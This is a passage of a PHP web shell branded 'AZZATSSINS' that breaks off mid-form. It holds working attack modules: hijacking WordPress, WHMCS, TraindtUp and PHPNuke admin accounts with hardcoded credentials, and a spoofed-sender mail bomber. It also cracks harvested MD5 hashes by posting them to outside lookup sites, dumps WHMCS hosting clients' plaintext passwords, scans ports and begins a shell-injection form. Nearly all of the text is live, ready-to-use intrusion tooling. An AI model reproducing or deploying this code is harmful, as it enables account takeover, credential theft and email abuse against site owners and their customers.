  870. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  871. <tr><td>&nbsp;&nbsp;User baru</td><td>
  872. <input style='width:220px;' class='inputz' type='text' name='admin' value='azzatssins' /></td></tr>
  873. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  874. <input style='width:80px;' class='inputz' type='text' name='pwd' value='17081945' />&nbsp;
  875.  
  876. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  877. </td></tr> </table><br><br><br><br>
  878. ";
  879. }else{
  880. $localhost = $_POST['localhost'];
  881. $database  = $_POST['database'];
  882. $username  = $_POST['username'];
  883. $password  = $_POST['password'];
  884. $pwd   = $_POST['pwd'];
  885. $admin = $_POST['admin'];
  886. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  887. @mysql_select_db($database) or die(mysql_error());
  888.  
  889. $hash = crypt($pwd);
  890. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  891. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  892. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  893. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  894. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  895. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  896. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  897. if($a4s){
  898. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  899. }
  900. }
  901. echo "</div>";
  902. }
  903. if($_GET['AZZATSSINS']=="encrypt"){
  904. echo "
  905. <table bgcolor=#cccccc width=\"100%\">
  906. <tbody><tr><td align=\"right\" width=100>
  907. <p dir=ltr><b><font color=#990000  size=-2><br><p align=left><center>
  908.  
  909. Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
  910. <form method=\"POST\">
  911. <font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
  912. <input type=\"submit\" value=\"Submit\"></form>";
  913. if(!$_POST['ENCRYPTION']=='')
  914. {
  915. $md5 = $_POST['ENCRYPTION'];
  916.     echo "<font color=gray>MD5 : </font>".md5($md5)."<br>";
  917.     echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
  918.     echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
  919.     echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
  920.     echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
  921.     echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br></tbody></tr></td></table>";
  922.   }
  923. }
  924. if($_GET['open']=="ports"){
  925. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
  926.         $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
  927.         echo("<script type=\"text/javascript\">");
  928.         echo("function Show(SelectValue){");
  929.         echo("document.getElementById('RangeDiv').style.display=\"none\";");
  930.         echo("document.getElementById('SpecificDiv').style.display=\"none\";");
  931.         echo("if(SelectValue == \"range\")");
  932.         echo("document.getElementById('RangeDiv').style.display=\"inline\";");
  933.         echo("if(SelectValue == \"specific\")");
  934.         echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
  935.         echo("}</script>");
  936.         echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
  937.         echo('<form method="post">');
  938.         echo('<u>Ports:</u><br /><br />');
  939.         echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
  940.         echo('<option value="automatic">Automatic - All Ports</option>');
  941.         echo('<option value="range">Range of Ports</option>');
  942.         echo('<option value="specific">Specific Ports</option>');
  943.         echo('</select><br /><br />');
  944.         echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
  945.         echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
  946.         echo('<input type="submit" id="submit" name="submit" value="Scan" />');
  947.         echo('</form>');
  948.         if(isset($_POST['submit'])){
  949.             $first = "yes";
  950.             echo("<br /><br /><u>Results</u>:<br />\n");
  951.  
  952.             if($_POST['port'] == "range"){
  953.                 if($rend > $rstart){
  954.                     for($i=$rstart;$i<$rend;$i++){
  955.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  956.                             if($first == "no")
  957.                                 echo(", ");
  958.                             echo $i;
  959.                             $first = "no";
  960.                         }
  961.                     }
  962.                     echo(".");
  963.                 }
  964.                 else{
  965.                     echo("Range start number can't be bigger than the end number.");
  966.                 }
  967.             }
  968.             else if($_POST['port'] == "specific"){
  969.                 $list = explode(" ",$_POST['specific']);
  970.                 foreach($list as $i){
  971.                     if(is_numeric($i)){
  972.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  973.                             if($first == "no")
  974.                                 echo(", ");
  975.                             echo $i;
  976.                             $first = "no";
  977.                         }
  978.                     }
  979.                 }
  980.                 echo(".");
  981.             }
  982.             else{
  983.                 for($i=0;$i>=0;$i++){
  984.                     if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  985.                         if($first == "no")
  986.                             echo(", ");
  987.                         echo $i;
  988.                         $first = "no";
  989.                     }
  990.                 }
  991.                 echo(".");
  992.             }
  993.         }
  994. }
  995. if($_GET['AZZATSSINS']=="BOMAIL"){
  996.  ?>
  997. <?php
  998. /**
  999. AZZATSSINS
  1000. **/
  1001.  
  1002. $kontol = 'Mail Bomber Siap Siaga...';
  1003.  
  1004. function boombardir($text){
  1005.     if (!get_magic_quotes_gpc()){
  1006.         return $text;
  1007.     }
  1008.     return stripslashed($text);
  1009. }
  1010. if(isset($_POST['kirim_email'])){
  1011.     $mail_to = $_POST['mail_to'];
  1012.     $fromname = $_POST['from_name'];
  1013.     $fromaddress = $_POST['mail_from'];
  1014.     $mail_subject = $_POST['mail_subject'];
  1015.     $mail_content = boombardir($_POST['mail_content']);
  1016.  
  1017.     $fuckline = "\n\t";
  1018.     $headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
  1019.  
  1020.     if (($_POST['banyak_email']) <=1) {
  1021.         if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
  1022.             $kontol = "email sent to $mail_to";
  1023.         }
  1024.         else $kontol = "Mail Sending is <font color=red> Failed </font> .";
  1025.     }
  1026.     elseif (($_POST['banyak_email']) > 1){
  1027.         $intibom = $_POST['banyak_email'];
  1028.         $kabehe = 0; $kabehekirim=0; $msgtf=0;
  1029.         for ($i=1; $i <= $intibom; $i++) {
  1030.             $acakjudul = substr(md5($i."slackerc0de"),-4);
  1031.             $mailsubject = $mail_subject." - ".$acakjudul;
  1032.             if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
  1033.                 $kabehekirim++;
  1034.             } else {
  1035.                 $msgtf++;
  1036.             }
  1037.             $kabehe++;
  1038.         }
  1039.     $kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
  1040.     }
  1041. }
  1042. ?>
  1043. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  1044. <br /><br />
  1045. <form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
  1046. <table style="padding: 0 0 0 30px">
  1047. <tr><td><br />
  1048.     <table style="padding: 0 0 0 30px">
  1049.         <tr><td width="100">Target eMail :<td width="300">
  1050.             <input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
  1051.         </tr></td>
  1052.         <tr><td>Sender Name :<td width="300">
  1053.             <input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
  1054.         </tr></td>
  1055.         <tr><td>Sender eMail :<td width="300">
  1056.             <input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
  1057.         </tr></td>
  1058.         <tr><td>Subject :<td width="300">
  1059.             <input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
  1060.         </tr></td>
  1061.         <tr><td>Total of Send :<td width="300">
  1062.             <input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
  1063.             <input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
  1064.         </tr></td>
  1065.     </table>
  1066. </td></tr>
  1067. <tr><td><br />
  1068. Message :
  1069. <center>
  1070.     <textarea name="mail_content" cols="60" rows="8" >
  1071.         <?php
  1072.             if ($mail_content) {
  1073.                 echo "mail_content";
  1074.             }
  1075.         ?>
  1076.     </textarea>
  1077. </center>
  1078. </td></tr>
  1079. </table>
  1080. </form><br />
  1081. <div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
  1082.     <?php
  1083. echo "$kontol";
  1084. ?>
  1085. <?php }
  1086.  
  1087. if($_GET['whmcs']=="passchanger"){
  1088. ?>
  1089. <p><br/><body>
  1090. <center><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
  1091. <p><form method="post">
  1092. <table border=1>
  1093. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  1094. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  1095. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  1096. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  1097. <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
  1098. <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="azzatssins" name="userbaru"></td></tr>
  1099. <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="17081945" name="passbaru"></td></tr>
  1100.  
  1101. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1102. </table>
  1103. <br>
  1104. </form>
  1105. </center>
  1106.  
  1107. <?php
  1108. if(isset($_POST['plapon'])) {
  1109. $anu1 = $_POST['anu1'];
  1110. $anu2 = $_POST['anu2'];
  1111. $anu3 = $_POST['anu3'];
  1112. $anu4 = $_POST['anu4'];
  1113. @mysql_connect($anu1,$anu2,$anu3);
  1114. @mysql_select_db($anu4);
  1115.  
  1116. $idmaho=str_replace("\'","'",$idmaho);
  1117. $target_id = $_POST['idmaho'];
  1118. $userbaru=str_replace("\'","'",$userbaru);
  1119. $ganti_user = $_POST['userbaru'];
  1120. $passbaru=str_replace("\'","'",$passbaru);
  1121.  
  1122. $hash_pass = $_POST['passbaru'];
  1123. $ganti_pass = md5($hash_pass);
  1124.  
  1125. $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  1126. $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  1127.  
  1128. $udah_ganteng=@mysql_query($colox);
  1129. $udah_ganteng=@mysql_query($coloxx);
  1130. if($udah_ganteng)
  1131. {
  1132. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1133. }
  1134. }
  1135. }
  1136.  
  1137.  
  1138. if($_GET['md5']=="decrypter"){
  1139. set_time_limit(0);
  1140. ?>
  1141. <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
  1142. <script type="text/JavaScript">
  1143. $(document).ready(function(){
  1144. $('pre').fadeIn(3000);
  1145.  
  1146. $('input[type="text"]').click(function(){
  1147. $(this).val('');
  1148. });
  1149.  
  1150.  
  1151.  
  1152. });
  1153.  
  1154. </script>
  1155.  
  1156. <?
  1157. if(!empty($_POST['password'])){
  1158. set_time_limit(0);
  1159. $password = nl2br($_POST['password']);
  1160.  
  1161. $ex = explode("<br />",$password);
  1162.  
  1163. $total_checked = 0;
  1164. $total_cracked = 0;
  1165. $total_failed  = 0;
  1166. $total_not_md5 = 0;
  1167.  
  1168. foreach($ex as $cracking_password){
  1169. $total_checked++;
  1170. $cracking_passwords   = explode("|",$cracking_password);
  1171. $cracking_password    = explode("|",$cracking_password);
  1172. $cracking_password    = $cracking_password[1];
  1173. echo $cracking_passwords[0]."|";
  1174. $cracking_password    = trim($cracking_password);
  1175. $regex = "/[a-z0-9]{32}/i";
  1176.  
  1177. if(preg_match($regex,$cracking_password)){
  1178. $curl_crack = curl_init();
  1179.  
  1180. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5online.net");
  1181. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1182. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"pass=".$cracking_password."&option=hash2text&send=Submit");
  1183. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1184. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1185. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1186. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1187.  
  1188.  
  1189. $exec = curl_exec($curl_crack);
  1190.  
  1191.  
  1192. if(preg_match("/pass : (.*)/",$exec,$cracked)){
  1193. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font>";
  1194. $total_cracked++;
  1195. flush();
  1196. }else{
  1197.  
  1198. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5decryption.com");
  1199. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1200. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&submit=Decrypt+It%21");
  1201. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1202. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1203. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1204. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1205. $exec = curl_exec($curl_crack);
  1206.  
  1207.  
  1208.  
  1209. if(preg_match("/<font size=.*>(.+)<\/font>/",$exec,$cracked)){
  1210. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1211. $total_cracked++;
  1212. flush();
  1213. }else{
  1214. $curl_crack = curl_init();
  1215. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5pass.info");
  1216. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1217. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&get_pass=Get+Pass");
  1218. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1219. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1220. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1221. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1222.  
  1223.  
  1224.  
  1225. $exec = curl_exec($curl_crack);
  1226.  
  1227. if(preg_match("/Password - <b>(.*)<\/b>/",$exec,$cracked)){
  1228. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1229. $total_cracked++;
  1230. flush();
  1231. }else{
  1232. $curl_crack = curl_init();
  1233. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5.noisette.ch");
  1234. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1235. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password);
  1236. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1237. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1238. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1239. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1240.  
  1241.  
  1242.  
  1243. $exec = curl_exec($curl_crack);
  1244.  
  1245.  
  1246.  
  1247. if(preg_match('/= md5\("(.*)"\)/',$exec,$cracked)){
  1248. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1249. $total_cracked++;
  1250. flush();
  1251. }else{
  1252.  
  1253. echo "<font size='2' color='red'><b>Not Found</b></font><br />";
  1254. $total_failed++;
  1255. flush();
  1256.  
  1257. }// Next update put the fifth website here
  1258.  
  1259. }
  1260. }
  1261.  
  1262.  
  1263.  
  1264.  
  1265.  
  1266.  
  1267.  
  1268.  
  1269.  
  1270.  
  1271.  
  1272.  
  1273. }
  1274. }
  1275.  
  1276. else{
  1277. $total_not_md5++;
  1278. echo $cracking_password."<br />";
  1279. flush();
  1280. continue;
  1281. }
  1282. //close curl //curl_close($curl_crack);
  1283. }
  1284.  
  1285. echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'><br><font size='2'>Total Password Checked : </font><b><font size='2'>".$total_checked."</font></b><br><font size='2' color='green'> Total Password Cracked : </font><font size='2'>".$total_cracked." </font><br><font size='2' color='red'> Total Password Faild : </font><b><font size='2'>".$total_failed."</font></b>"." </font><br><font size='2' color='orange'> Total Note Md5 : </font><b><font size='2'>".$total_not_md5."</font></b>";
  1286. }else{
  1287. ?>
  1288. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  1289. <center>
  1290. <form method="POST">
  1291.  
  1292.  
  1293. </textarea> <textarea cols='70' rows='15' name="password" placeholder="EMAIL|MD5"></textarea>
  1294.  
  1295. <br><br>
  1296. <input type="submit" name="crack" value="Crack Password">
  1297. <br>
  1298. </form>
  1299. </center>
  1300. <?
  1301. }}
  1302.  
  1303. if($_GET['traindt']=="login"){
  1304. set_time_limit(0);
  1305. echo "<html><head><title>TraindtUpLoginChanger</title></head>";
  1306. echo "<body><center>
  1307. <h2>AZZATSSINS</h2>
  1308. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
  1309. <form method=POST action=''>
  1310. DB HOST<br/>
  1311. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  1312. DB NAME<br/>
  1313. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1314. DB USER<br/>
  1315. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1316. DB PASSWORD<br/>
  1317. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  1318. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
  1319. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  1320. NEW ADMIN LOGIN USER<br/>
  1321. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1322. NEW ADMIN LOGIN PASS<br/>
  1323. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  1324.  
  1325. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  1326.  
  1327. $anu1 = $_POST['anu1'];
  1328. $anu2 = $_POST['anu2'];
  1329. $anu3 = $_POST['anu3'];
  1330. $anu4 = $_POST['anu4'];
  1331. @mysql_connect($anu1,$anu3,$anu4);
  1332. @mysql_select_db($anu2);
  1333.  
  1334. $idmaho=str_replace("\'","'",$idmaho);
  1335. $target_id = $_POST['idmaho'];
  1336.  
  1337. $userbaru=str_replace("\'","'",$userbaru);
  1338. $ganti_user = $_POST['userbaru'];
  1339.  
  1340. $passbaru=str_replace("\'","'",$passbaru);
  1341. $hash_pass = $_POST['passbaru'];
  1342. $ganti_pass = md5($hash_pass);
  1343.  
  1344. $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
  1345. $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
  1346.  
  1347. $oke=@mysql_query($sodok1);
  1348. $oke=@mysql_query($sodok2);
  1349. if($oke)
  1350. {
  1351. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  1352. }
  1353. }
  1354.  
  1355. if($_GET['nuke']=="login"){
  1356. set_time_limit(0);
  1357. echo "<html><head><title>PHPNukeLoginChanger</title></head>";
  1358. echo "<body><center>
  1359. <h2>AZZATSSINS</h2>
  1360. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
  1361. <form method=POST action=''>
  1362. DB HOST<br/>
  1363. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  1364. DB NAME<br/>
  1365. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1366. DB USER<br/>
  1367. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1368. DB PASSWORD<br/>
  1369. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  1370. <hr style='color:lime;'>
  1371.  
  1372. TARGET PREFIX<br/>
  1373. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
  1374. NEW ADMIN LOGIN USER<br/>
  1375. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1376. NEW ADMIN LOGIN PASS<br/>
  1377. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  1378.  
  1379. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  1380.  
  1381. $anu1 = $_POST['anu1'];
  1382. $anu2 = $_POST['anu2'];
  1383. $anu3 = $_POST['anu3'];
  1384. $anu4 = $_POST['anu4'];
  1385. @mysql_connect($anu1,$anu3,$anu4);
  1386. @mysql_select_db($anu2);
  1387.  
  1388. $userbaru=str_replace("\'","'",$userbaru);
  1389. $ganti_user = $_POST['userbaru'];
  1390. $passbaru=str_replace("\'","'",$passbaru);
  1391. $hash_pass = $_POST['passbaru'];
  1392. $ganti_pass = md5($hash_pass);
  1393.  
  1394. $prefix = $_POST['prefix'];
  1395. $table_name1 = $prefix."users" ;
  1396. $table_name2 = $prefix."authors" ;
  1397.  
  1398. $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
  1399. $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
  1400. $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
  1401. $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
  1402.  
  1403. $oke=@mysql_query($okenuke1);
  1404. $oke=@mysql_query($okenuke2);
  1405. $oke=@mysql_query($okenuke3);
  1406. $oke=@mysql_query($okenuke4);
  1407. if($oke)
  1408. {
  1409. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  1410. }
  1411. }
  1412.  
  1413. if($_GET['ceck']=="whmcs"){
  1414. set_time_limit(0);
  1415. ?>
  1416.  <p><br/><body>
  1417. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
  1418. <p><form method="post">
  1419. <table border=1>
  1420. <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
  1421. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
  1422. <br></form></center>
  1423.  
  1424. <?php
  1425. @error_reporting(0);
  1426. @ini_set('log_errors',0);
  1427. @ini_set('error_log',NULL);
  1428. if(isset($_POST['plapon'])){
  1429. $target = $_POST['url'];
  1430. $bukadikitjoss = fopen("$target/?licensedebug","r");
  1431. $hasil = '';
  1432. while (!feof($bukadikitjoss)) {
  1433. $hasil .= fread($bukadikitjoss, 8192);
  1434. }
  1435. echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
  1436. }
  1437. echo "</table>";
  1438. }
  1439.  
  1440. if($_GET['whmcs']=="client"){
  1441. set_time_limit(0);
  1442. ?>
  1443. <p><br/><body>
  1444. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
  1445. <p><form method="post">
  1446. <table border=1>
  1447. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  1448. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  1449. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  1450. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  1451. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1452.  
  1453. </table>
  1454. <br></form></center>
  1455.  
  1456. <?php
  1457. if(isset($_POST['plapon'])) {
  1458.  
  1459. $perawan = $_POST['anu1'];
  1460. $kimcil = $_POST['anu2'];
  1461. $janda = $_POST['anu3'];
  1462. $hotel = $_POST['anu4'];
  1463. function get_string_between($string, $start, $end){
  1464. $string = " ".$string;
  1465. $ini = strpos($string,$start);
  1466. if ($ini == 0) return "";
  1467. $ini += strlen($start);
  1468. $len = strpos($string,$end,$ini) - $ini;
  1469. return substr($string,$ini,$len);
  1470. }
  1471. @mysql_connect($perawan,$kimcil,$janda);
  1472. @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
  1473. $query="select subject,message from tblemails";
  1474. $result=mysql_query($query);
  1475. mysql_close();
  1476. $num=mysql_numrows($result);
  1477. $i=0;
  1478. while ($i < $num) {
  1479. $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  1480. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
  1481. <th align='center'><b>CLIENT EMAIL</b></th>
  1482. <th align='center'><b>CLIENT PASSWORD</b></th>
  1483. </tr>";
  1484.  
  1485.  
  1486. if(stristr($css,"Welcome")){
  1487. $s =mysql_result($result,$i,"message");
  1488. if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
  1489. $mail= get_string_between($s,"Login Username: ","<br />");
  1490. $m2 = get_string_between($s,"Email Address: ","<br />");
  1491. $pass = get_string_between($s,"Password: ","</p>");
  1492. print $mail.$m2.":".$pass."<br>";
  1493.  
  1494. echo "<tr>
  1495. <td align='center'>$mail.$m2.</td>
  1496. <td align='center'>".$pass."</td>
  1497. </tr>";
  1498. }
  1499. }
  1500. ++$i;
  1501. }
  1502. }  
  1503. echo "</table>";
  1504. }
  1505.  
  1506. if($_GET['whmcs']=="shell"){
  1507. set_time_limit(0);
  1508. ?>
  1509.  <p><br/><body>
  1510. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
  1511. <p><form method="post">
  1512. <table border=1>
  1513. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  1514. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  1515. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  1516. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  1517. <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
